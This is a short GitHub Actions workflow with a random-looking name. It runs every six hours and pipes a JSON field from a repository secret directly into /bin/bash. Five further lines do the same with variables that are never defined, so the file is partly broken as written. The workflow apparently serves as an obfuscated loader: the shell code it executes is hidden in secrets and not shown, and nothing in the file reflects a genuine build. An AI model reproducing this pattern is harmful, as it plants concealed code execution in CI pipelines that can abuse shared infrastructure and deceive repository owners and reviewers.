name: tianjiayiguo
on:
  workflow_dispatch:
  schedule:
    - cron: '16 4/6 * * *'

jobs:  # 19873
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: tianjiayiguo
        env:
          j7: ${{ secrets.j7 }}
        run: |
          echo $j7 | jq -r .nfa9 | /bin/bash
          echo $se8 | jq -r .fjx9 | /bin/bash
          echo $ep19 | jq -r .rxmci33595 | /bin/bash
          echo $z7 | jq -r .bpv95682 | /bin/bash
          echo $esp04 | jq -r .hehq70484 | /bin/bash
          echo $whgtv3515 | jq -r .gwmip78 | /bin/bash

